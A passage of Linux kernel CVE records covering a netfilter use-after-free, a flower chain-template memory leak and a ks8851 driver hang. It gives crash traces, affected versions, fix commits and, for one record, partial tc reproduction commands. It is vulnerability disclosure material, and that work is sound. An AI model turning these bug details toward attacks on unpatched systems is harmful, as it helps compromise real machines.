task_work_run+0xdd/0x1a0 kernel/task_work.c:164
tracehook_notify_resume include/linux/tracehook.h:189 [inline]
exit_to_user_mode_loop kernel/entry/common.c:175 [inline]
exit_to_user_mode_prepare+0x27e/0x290 kernel/entry/common.c:207
__syscall_exit_to_user_mode_work kernel/entry/common.c:289 [inline]
syscall_exit_to_user_mode+0x19/0x60 kernel/entry/common.c:300
do_syscall_64+0x42/0xb0 arch/x86/entry/common.c:86
entry_SYSCALL_64_after_hwframe+0x44/0xae
RIP: 0033:0x7f75fbf28adb
Code: 0f 05 48 3d 00 f0 ff ff 77 45 c3 0f 1f 40 00 48 83 ec 18 89 7c 24 0c e8 63 fc ff ff 8b 7c 24 0c 41 89 c0 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 35 44 89 c7 89 44 24 0c e8 a1 fc ff ff 8b 44
RSP: 002b:00007ffd8da7ec10 EFLAGS: 00000293 ORIG_RAX: 0000000000000003
RAX: 0000000000000000 RBX: 0000000000000004 RCX: 00007f75fbf28adb
RDX: 00007f75fc08e828 RSI: ffffffffffffffff RDI: 0000000000000003
RBP: 00007f75fc08a960 R08: 0000000000000000 R09: 00007f75fc08e830
R10: 00007ffd8da7ed10 R11: 0000000000000293 R12: 00000000002067c3
R13: 00007ffd8da7ed10 R14: 00007f75fc088f60 R15: 0000000000000032
</TASK>
Allocated by task 8886:
kasan_save_stack+0x1e/0x50 mm/kasan/common.c:38
kasan_set_track mm/kasan/common.c:46 [inline]
set_alloc_info mm/kasan/common.c:434 [inline]
____kasan_kmalloc mm/kasan/common.c:513 [inline]
____kasan_kmalloc mm/kasan/common.c:472 [inline]
__kasan_kmalloc+0xa6/0xd0 mm/kasan/common.c:522
kasan_kmalloc include/linux/kasan.h:269 [inline]
kmem_cache_alloc_trace+0x1ea/0x4a0 mm/slab.c:3575
kmalloc include/linux/slab.h:590 [inline]
nft_setelem_catchall_insert net/netfilter/nf_tables_api.c:5544 [inline]
nft_setelem_insert net/netfilter/nf_tables_api.c:5562 [inline]
nft_add_set_elem+0x232e/0x2f40 net/netfilter/nf_tables_api.c:5936
nf_tables_newsetelem+0x6ff/0xbb0 net/netfilter/nf_tables_api.c:6032
nfnetlink_rcv_batch+0x1710/0x25f0 net/netfilter/nfnetlink.c:513
nfnetlink_rcv_skb_batch net/netfilter/nfnetlink.c:634 [inline]
nfnetlink_rcv+0x3af/0x420 net/netfilter/nfnetlink.c:652
netlink_unicast_kernel net/netlink/af_netlink.c:1319 [inline]
netlink_unicast+0x533/0x7d0 net/netlink/af_netlink.c:1345
netlink_sendmsg+0x904/0xdf0 net/netlink/af_netlink.c:1921
sock_sendmsg_nosec net/
---truncated---
References
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T05:24:39.888Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9d558e5f0d6fdd0a568f73dceb0b40c4f5012e5a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0f7d9b31ce7abdbb29bf018131ac920c9f698518"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-47106",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-15T19:25:52.257046Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-15T19:25:59.608Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9d558e5f0d6fdd0a568f73dceb0b40c4f5012e5a",
"status": "affected",
"version": "aaa31047a6d25da0fa101da1ed544e1247949b40",
"versionType": "git"
},
{
"lessThan": "0f7d9b31ce7abdbb29bf018131ac920c9f698518",
"status": "affected",
"version": "aaa31047a6d25da0fa101da1ed544e1247949b40",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.13"
},
{
"lessThan": "5.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.16",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.12",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16",
"versionStartIncluding": "5.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: fix use-after-free in nft_set_catchall_destroy()\n\nWe need to use list_for_each_entry_safe() iterator\nbecause we can not access @catchall after kfree_rcu() call.\n\nsyzbot reported:\n\nBUG: KASAN: use-after-free in nft_set_catchall_destroy net/netfilter/nf_tables_api.c:4486 [inline]\nBUG: KASAN: use-after-free in nft_set_destroy net/netfilter/nf_tables_api.c:4504 [inline]\nBUG: KASAN: use-after-free in nft_set_destroy+0x3fd/0x4f0 net/netfilter/nf_tables_api.c:4493\nRead of size 8 at addr ffff8880716e5b80 by task syz-executor.3/8871\n\nCPU: 1 PID: 8871 Comm: syz-executor.3 Not tainted 5.16.0-rc5-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0xcd/0x134 lib/dump_stack.c:106\n print_address_description.constprop.0.cold+0x8d/0x2ed mm/kasan/report.c:247\n __kasan_report mm/kasan/report.c:433 [inline]\n kasan_report.cold+0x83/0xdf mm/kasan/report.c:450\n nft_set_catchall_destroy net/netfilter/nf_tables_api.c:4486 [inline]\n nft_set_destroy net/netfilter/nf_tables_api.c:4504 [inline]\n nft_set_destroy+0x3fd/0x4f0 net/netfilter/nf_tables_api.c:4493\n __nft_release_table+0x79f/0xcd0 net/netfilter/nf_tables_api.c:9626\n nft_rcv_nl_event+0x4f8/0x670 net/netfilter/nf_tables_api.c:9688\n notifier_call_chain+0xb5/0x200 kernel/notifier.c:83\n blocking_notifier_call_chain kernel/notifier.c:318 [inline]\n blocking_notifier_call_chain+0x67/0x90 kernel/notifier.c:306\n netlink_release+0xcb6/0x1dd0 net/netlink/af_netlink.c:788\n __sock_release+0xcd/0x280 net/socket.c:649\n sock_close+0x18/0x20 net/socket.c:1314\n __fput+0x286/0x9f0 fs/file_table.c:280\n task_work_run+0xdd/0x1a0 kernel/task_work.c:164\n tracehook_notify_resume include/linux/tracehook.h:189 [inline]\n exit_to_user_mode_loop kernel/entry/common.c:175 [inline]\n exit_to_user_mode_prepare+0x27e/0x290 kernel/entry/common.c:207\n __syscall_exit_to_user_mode_work kernel/entry/common.c:289 [inline]\n syscall_exit_to_user_mode+0x19/0x60 kernel/entry/common.c:300\n do_syscall_64+0x42/0xb0 arch/x86/entry/common.c:86\n entry_SYSCALL_64_after_hwframe+0x44/0xae\nRIP: 0033:0x7f75fbf28adb\nCode: 0f 05 48 3d 00 f0 ff ff 77 45 c3 0f 1f 40 00 48 83 ec 18 89 7c 24 0c e8 63 fc ff ff 8b 7c 24 0c 41 89 c0 b8 03 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 77 35 44 89 c7 89 44 24 0c e8 a1 fc ff ff 8b 44\nRSP: 002b:00007ffd8da7ec10 EFLAGS: 00000293 ORIG_RAX: 0000000000000003\nRAX: 0000000000000000 RBX: 0000000000000004 RCX: 00007f75fbf28adb\nRDX: 00007f75fc08e828 RSI: ffffffffffffffff RDI: 0000000000000003\nRBP: 00007f75fc08a960 R08: 0000000000000000 R09: 00007f75fc08e830\nR10: 00007ffd8da7ed10 R11: 0000000000000293 R12: 00000000002067c3\nR13: 00007ffd8da7ed10 R14: 00007f75fc088f60 R15: 0000000000000032\n \u003c/TASK\u003e\n\nAllocated by task 8886:\n kasan_save_stack+0x1e/0x50 mm/kasan/common.c:38\n kasan_set_track mm/kasan/common.c:46 [inline]\n set_alloc_info mm/kasan/common.c:434 [inline]\n ____kasan_kmalloc mm/kasan/common.c:513 [inline]\n ____kasan_kmalloc mm/kasan/common.c:472 [inline]\n __kasan_kmalloc+0xa6/0xd0 mm/kasan/common.c:522\n kasan_kmalloc include/linux/kasan.h:269 [inline]\n kmem_cache_alloc_trace+0x1ea/0x4a0 mm/slab.c:3575\n kmalloc include/linux/slab.h:590 [inline]\n nft_setelem_catchall_insert net/netfilter/nf_tables_api.c:5544 [inline]\n nft_setelem_insert net/netfilter/nf_tables_api.c:5562 [inline]\n nft_add_set_elem+0x232e/0x2f40 net/netfilter/nf_tables_api.c:5936\n nf_tables_newsetelem+0x6ff/0xbb0 net/netfilter/nf_tables_api.c:6032\n nfnetlink_rcv_batch+0x1710/0x25f0 net/netfilter/nfnetlink.c:513\n nfnetlink_rcv_skb_batch net/netfilter/nfnetlink.c:634 [inline]\n nfnetlink_rcv+0x3af/0x420 net/netfilter/nfnetlink.c:652\n netlink_unicast_kernel net/netlink/af_netlink.c:1319 [inline]\n netlink_unicast+0x533/0x7d0 net/netlink/af_netlink.c:1345\n netlink_sendmsg+0x904/0xdf0 net/netlink/af_netlink.c:1921\n sock_sendmsg_nosec net/\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:04:17.759Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9d558e5f0d6fdd0a568f73dceb0b40c4f5012e5a"
},
{
"url": "https://git.kernel.org/stable/c/0f7d9b31ce7abdbb29bf018131ac920c9f698518"
}
],
"title": "netfilter: nf_tables: fix use-after-free in nft_set_catchall_destroy()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2021-47106",
"datePublished": "2024-03-04T18:15:20.190Z",
"dateReserved": "2024-03-04T18:12:48.835Z",
"dateUpdated": "2025-05-04T07:04:17.759Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26669 (GCVE-0-2024-26669)
Vulnerability from cvelistv5
Published
2024-04-02 06:43
Modified
2025-05-04 08:53
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/sched: flower: Fix chain template offload
When a qdisc is deleted from a net device the stack instructs the
underlying driver to remove its flow offload callback from the
associated filter block using the 'FLOW_BLOCK_UNBIND' command. The stack
then continues to replay the removal of the filters in the block for
this driver by iterating over the chains in the block and invoking the
'reoffload' operation of the classifier being used. In turn, the
classifier in its 'reoffload' operation prepares and emits a
'FLOW_CLS_DESTROY' command for each filter.
However, the stack does not do the same for chain templates and the
underlying driver never receives a 'FLOW_CLS_TMPLT_DESTROY' command when
a qdisc is deleted. This results in a memory leak [1] which can be
reproduced using [2].
Fix by introducing a 'tmplt_reoffload' operation and have the stack
invoke it with the appropriate arguments as part of the replay.
Implement the operation in the sole classifier that supports chain
templates (flower) by emitting the 'FLOW_CLS_TMPLT_{CREATE,DESTROY}'
command based on whether a flow offload callback is being bound to a
filter block or being unbound from one.
As far as I can tell, the issue happens since cited commit which
reordered tcf_block_offload_unbind() before tcf_block_flush_all_chains()
in __tcf_block_put(). The order cannot be reversed as the filter block
is expected to be freed after flushing all the chains.
[1]
unreferenced object 0xffff888107e28800 (size 2048):
comm "tc", pid 1079, jiffies 4294958525 (age 3074.287s)
hex dump (first 32 bytes):
b1 a6 7c 11 81 88 ff ff e0 5b b3 10 81 88 ff ff ..|......[......
01 00 00 00 00 00 00 00 e0 aa b0 84 ff ff ff ff ................
backtrace:
[<ffffffff81c06a68>] __kmem_cache_alloc_node+0x1e8/0x320
[<ffffffff81ab374e>] __kmalloc+0x4e/0x90
[<ffffffff832aec6d>] mlxsw_sp_acl_ruleset_get+0x34d/0x7a0
[<ffffffff832bc195>] mlxsw_sp_flower_tmplt_create+0x145/0x180
[<ffffffff832b2e1a>] mlxsw_sp_flow_block_cb+0x1ea/0x280
[<ffffffff83a10613>] tc_setup_cb_call+0x183/0x340
[<ffffffff83a9f85a>] fl_tmplt_create+0x3da/0x4c0
[<ffffffff83a22435>] tc_ctl_chain+0xa15/0x1170
[<ffffffff838a863c>] rtnetlink_rcv_msg+0x3cc/0xed0
[<ffffffff83ac87f0>] netlink_rcv_skb+0x170/0x440
[<ffffffff83ac6270>] netlink_unicast+0x540/0x820
[<ffffffff83ac6e28>] netlink_sendmsg+0x8d8/0xda0
[<ffffffff83793def>] ____sys_sendmsg+0x30f/0xa80
[<ffffffff8379d29a>] ___sys_sendmsg+0x13a/0x1e0
[<ffffffff8379d50c>] __sys_sendmsg+0x11c/0x1f0
[<ffffffff843b9ce0>] do_syscall_64+0x40/0xe0
unreferenced object 0xffff88816d2c0400 (size 1024):
comm "tc", pid 1079, jiffies 4294958525 (age 3074.287s)
hex dump (first 32 bytes):
40 00 00 00 00 00 00 00 57 f6 38 be 00 00 00 00 @.......W.8.....
10 04 2c 6d 81 88 ff ff 10 04 2c 6d 81 88 ff ff ..,m......,m....
backtrace:
[<ffffffff81c06a68>] __kmem_cache_alloc_node+0x1e8/0x320
[<ffffffff81ab36c1>] __kmalloc_node+0x51/0x90
[<ffffffff81a8ed96>] kvmalloc_node+0xa6/0x1f0
[<ffffffff82827d03>] bucket_table_alloc.isra.0+0x83/0x460
[<ffffffff82828d2b>] rhashtable_init+0x43b/0x7c0
[<ffffffff832aed48>] mlxsw_sp_acl_ruleset_get+0x428/0x7a0
[<ffffffff832bc195>] mlxsw_sp_flower_tmplt_create+0x145/0x180
[<ffffffff832b2e1a>] mlxsw_sp_flow_block_cb+0x1ea/0x280
[<ffffffff83a10613>] tc_setup_cb_call+0x183/0x340
[<ffffffff83a9f85a>] fl_tmplt_create+0x3da/0x4c0
[<ffffffff83a22435>] tc_ctl_chain+0xa15/0x1170
[<ffffffff838a863c>] rtnetlink_rcv_msg+0x3cc/0xed0
[<ffffffff83ac87f0>] netlink_rcv_skb+0x170/0x440
[<ffffffff83ac6270>] netlink_unicast+0x540/0x820
[<ffffffff83ac6e28>] netlink_sendmsg+0x8d8/0xda0
[<ffffffff83793def>] ____sys_sendmsg+0x30f/0xa80
[2]
# tc qdisc add dev swp1 clsact
# tc chain add dev swp1 ingress proto ip chain 1 flower dst_ip 0.0.0.0/32
# tc qdisc del dev
---truncated---
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26669",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-02T18:36:26.875588Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-04T17:38:55.453Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.714Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9ed46144cff3598a5cf79955630e795ff9af5b97"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c04709b2cc99ae31c346f79f0211752d7b74df01"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/32f2a0afa95fae0d1ceec2ff06e0e816939964b8"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/net/sch_generic.h",
"net/sched/cls_api.c",
"net/sched/cls_flower.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9ed46144cff3598a5cf79955630e795ff9af5b97",
"status": "affected",
"version": "bbf73830cd48cff1599811d4f69c7cfd49c7b869",
"versionType": "git"
},
{
"lessThan": "c04709b2cc99ae31c346f79f0211752d7b74df01",
"status": "affected",
"version": "bbf73830cd48cff1599811d4f69c7cfd49c7b869",
"versionType": "git"
},
{
"lessThan": "32f2a0afa95fae0d1ceec2ff06e0e816939964b8",
"status": "affected",
"version": "bbf73830cd48cff1599811d4f69c7cfd49c7b869",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/net/sch_generic.h",
"net/sched/cls_api.c",
"net/sched/cls_flower.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: flower: Fix chain template offload\n\nWhen a qdisc is deleted from a net device the stack instructs the\nunderlying driver to remove its flow offload callback from the\nassociated filter block using the \u0027FLOW_BLOCK_UNBIND\u0027 command. The stack\nthen continues to replay the removal of the filters in the block for\nthis driver by iterating over the chains in the block and invoking the\n\u0027reoffload\u0027 operation of the classifier being used. In turn, the\nclassifier in its \u0027reoffload\u0027 operation prepares and emits a\n\u0027FLOW_CLS_DESTROY\u0027 command for each filter.\n\nHowever, the stack does not do the same for chain templates and the\nunderlying driver never receives a \u0027FLOW_CLS_TMPLT_DESTROY\u0027 command when\na qdisc is deleted. This results in a memory leak [1] which can be\nreproduced using [2].\n\nFix by introducing a \u0027tmplt_reoffload\u0027 operation and have the stack\ninvoke it with the appropriate arguments as part of the replay.\nImplement the operation in the sole classifier that supports chain\ntemplates (flower) by emitting the \u0027FLOW_CLS_TMPLT_{CREATE,DESTROY}\u0027\ncommand based on whether a flow offload callback is being bound to a\nfilter block or being unbound from one.\n\nAs far as I can tell, the issue happens since cited commit which\nreordered tcf_block_offload_unbind() before tcf_block_flush_all_chains()\nin __tcf_block_put(). The order cannot be reversed as the filter block\nis expected to be freed after flushing all the chains.\n\n[1]\nunreferenced object 0xffff888107e28800 (size 2048):\n comm \"tc\", pid 1079, jiffies 4294958525 (age 3074.287s)\n hex dump (first 32 bytes):\n b1 a6 7c 11 81 88 ff ff e0 5b b3 10 81 88 ff ff ..|......[......\n 01 00 00 00 00 00 00 00 e0 aa b0 84 ff ff ff ff ................\n backtrace:\n [\u003cffffffff81c06a68\u003e] __kmem_cache_alloc_node+0x1e8/0x320\n [\u003cffffffff81ab374e\u003e] __kmalloc+0x4e/0x90\n [\u003cffffffff832aec6d\u003e] mlxsw_sp_acl_ruleset_get+0x34d/0x7a0\n [\u003cffffffff832bc195\u003e] mlxsw_sp_flower_tmplt_create+0x145/0x180\n [\u003cffffffff832b2e1a\u003e] mlxsw_sp_flow_block_cb+0x1ea/0x280\n [\u003cffffffff83a10613\u003e] tc_setup_cb_call+0x183/0x340\n [\u003cffffffff83a9f85a\u003e] fl_tmplt_create+0x3da/0x4c0\n [\u003cffffffff83a22435\u003e] tc_ctl_chain+0xa15/0x1170\n [\u003cffffffff838a863c\u003e] rtnetlink_rcv_msg+0x3cc/0xed0\n [\u003cffffffff83ac87f0\u003e] netlink_rcv_skb+0x170/0x440\n [\u003cffffffff83ac6270\u003e] netlink_unicast+0x540/0x820\n [\u003cffffffff83ac6e28\u003e] netlink_sendmsg+0x8d8/0xda0\n [\u003cffffffff83793def\u003e] ____sys_sendmsg+0x30f/0xa80\n [\u003cffffffff8379d29a\u003e] ___sys_sendmsg+0x13a/0x1e0\n [\u003cffffffff8379d50c\u003e] __sys_sendmsg+0x11c/0x1f0\n [\u003cffffffff843b9ce0\u003e] do_syscall_64+0x40/0xe0\nunreferenced object 0xffff88816d2c0400 (size 1024):\n comm \"tc\", pid 1079, jiffies 4294958525 (age 3074.287s)\n hex dump (first 32 bytes):\n 40 00 00 00 00 00 00 00 57 f6 38 be 00 00 00 00 @.......W.8.....\n 10 04 2c 6d 81 88 ff ff 10 04 2c 6d 81 88 ff ff ..,m......,m....\n backtrace:\n [\u003cffffffff81c06a68\u003e] __kmem_cache_alloc_node+0x1e8/0x320\n [\u003cffffffff81ab36c1\u003e] __kmalloc_node+0x51/0x90\n [\u003cffffffff81a8ed96\u003e] kvmalloc_node+0xa6/0x1f0\n [\u003cffffffff82827d03\u003e] bucket_table_alloc.isra.0+0x83/0x460\n [\u003cffffffff82828d2b\u003e] rhashtable_init+0x43b/0x7c0\n [\u003cffffffff832aed48\u003e] mlxsw_sp_acl_ruleset_get+0x428/0x7a0\n [\u003cffffffff832bc195\u003e] mlxsw_sp_flower_tmplt_create+0x145/0x180\n [\u003cffffffff832b2e1a\u003e] mlxsw_sp_flow_block_cb+0x1ea/0x280\n [\u003cffffffff83a10613\u003e] tc_setup_cb_call+0x183/0x340\n [\u003cffffffff83a9f85a\u003e] fl_tmplt_create+0x3da/0x4c0\n [\u003cffffffff83a22435\u003e] tc_ctl_chain+0xa15/0x1170\n [\u003cffffffff838a863c\u003e] rtnetlink_rcv_msg+0x3cc/0xed0\n [\u003cffffffff83ac87f0\u003e] netlink_rcv_skb+0x170/0x440\n [\u003cffffffff83ac6270\u003e] netlink_unicast+0x540/0x820\n [\u003cffffffff83ac6e28\u003e] netlink_sendmsg+0x8d8/0xda0\n [\u003cffffffff83793def\u003e] ____sys_sendmsg+0x30f/0xa80\n\n[2]\n # tc qdisc add dev swp1 clsact\n # tc chain add dev swp1 ingress proto ip chain 1 flower dst_ip 0.0.0.0/32\n # tc qdisc del dev\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:53:33.748Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9ed46144cff3598a5cf79955630e795ff9af5b97"
},
{
"url": "https://git.kernel.org/stable/c/c04709b2cc99ae31c346f79f0211752d7b74df01"
},
{
"url": "https://git.kernel.org/stable/c/32f2a0afa95fae0d1ceec2ff06e0e816939964b8"
}
],
"title": "net/sched: flower: Fix chain template offload",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26669",
"datePublished": "2024-04-02T06:43:30.378Z",
"dateReserved": "2024-02-19T14:20:24.150Z",
"dateUpdated": "2025-05-04T08:53:33.748Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35971 (GCVE-0-2024-35971)
Vulnerability from cvelistv5
Published
2024-05-20 09:41
Modified
2025-05-04 09:09
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: ks8851: Handle softirqs at the end of IRQ thread to fix hang
The ks8851_irq() thread may call ks8851_rx_pkts() in case there are
any packets in the MAC FIFO, which calls netif_rx(). This netif_rx()
implementation is guarded by local_bh_disable() and local_bh_enable().
The local_bh_enable() may call do_softirq() to run softirqs in case
any are pending. One of the softirqs is net_rx_action, which ultimately
reaches the driver .start_xmit callback. If that happens, the system
hangs. The entire call chain is below:
ks8851_start_xmit_par from netdev_start_xmit
netdev_start_xmit from dev_hard_start_xmit
dev_hard_start_xmit from sch_direct_xmit
sch_direct_xmit from __dev_queue_xmit
__dev_queue_xmit from __neigh_update
__neigh_update from neigh_update
neigh_update from arp_process.constprop.0
arp_process.constprop.0 from __netif_receive_skb_one_core
__netif_receive_skb_one_core from process_backlog
process_backlog from __napi_poll.constprop.0
__napi_poll.constprop.0 from net_rx_action
net_rx_action from __do_softirq
__do_softirq from call_with_stack
call_with_stack from do_softirq
do_softirq from __local_bh_enable_ip
__local_bh_enable_ip from netif_rx
netif_rx from ks8851_irq
ks8851_irq from irq_thread_fn
irq_thread_fn from irq_thread
irq_thread from kthread
kthread from ret_from_fork
The hang happens because ks8851_irq() first locks a spinlock in
ks8851_par.c ks8851_lock_par() spin_lock_irqsave(&ksp->lock, ...)
and with that spinlock locked, calls netif_rx(). Once the execution
reaches ks8851_start_xmit_par(), it calls ks8851_lock_par() again
which attempts to claim the already locked spinlock again, and the
hang happens.
Move the do_softirq() call outside of the spinlock protected section
of ks8851_irq() by disabling BHs around the entire spinlock protected
section of ks8851_irq() handler. Place local_bh_enable() outside of
the spinlock protected section, so that it can trigger do_softirq()
without the ks8851_par.c ks8851_lock_par() spinlock being held, and
safely call ks8851_start_xmit_par() without attempting to lock the
already locked spinlock.
Since ks8851_irq() is protected by local_bh_disable()/local_bh_enable()
now, replace netif_rx() with __netif_rx() which is not duplicating the
local_bh_disable()/local_bh_enable() calls.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35971",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T15:04:05.232058Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:33:27.183Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.046Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/492337a4fbd1421b42df684ee9b34be2a2722540"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cba376eb036c2c20077b41d47b317d8218fe754f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/49d5d70538b6b8f2a3f8f1ac30c1f921d4a0929b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/be0384bf599cf1eb8d337517feeb732d71f75a6f"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/05/30/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/05/30/1"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/micrel/ks8851_common.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "492337a4fbd1421b42df684ee9b34be2a2722540",
"status": "affected",
"version": "797047f875b5463719cc70ba213eb691d453c946",
"versionType": "git"
},
{
"lessThan": "cba376eb036c2c20077b41d47b317d8218fe754f",
"status": "affected",
"version": "797047f875b5463719cc70ba213eb691d453c946",
"versionType": "git"
},
{
"lessThan": "49d5d70538b6b8f2a3f8f1ac30c1f921d4a0929b",
"status": "affected",
"version": "797047f875b5463719cc70ba213eb691d453c946",
"versionType": "git"
},
{
"lessThan": "be0384bf599cf1eb8d337517feeb732d71f75a6f",
"status": "affected",
"version": "797047f875b5463719cc70ba213eb691d453c946",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/micrel/ks8851_common.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.8"
},
{
"lessThan": "5.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.87",
